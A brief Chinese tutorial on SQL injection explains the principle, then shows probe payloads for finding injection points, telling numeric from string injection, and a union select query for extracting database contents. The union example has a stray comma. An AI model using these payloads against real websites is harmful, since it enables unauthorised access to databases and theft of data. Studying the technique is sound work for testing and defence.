sql注入实战

sql注入的原理是吧用户输入的数据都当做代码来执行,最终达到将欺骗服务器的恶意指令输入数据库中。

首先,寻找注入点,常见的注入点用户的登陆界面,搜索框等。

?ID=100’ 返回错误说明可能存在注入

?id = 100 and 1=1 返回正常

?id =100 and 1=2 返回错误

满足以上三点,说明存在注入点。

然后判断注入类型

?id = 100 and 1=1 返回成功

?id = 100 and 1=2 返回失败

说明存在数值型注入

?id = 1' and  '1' ='1 返回成功

? id = 1' and '1' = '2 返回失败

说明存在字符型注入

找到注入点之后联合查询,获取数据库内容

union select 1,2,3,4,5,6,7,8,9,from table

 

你可能感兴趣的:(sql,数据库)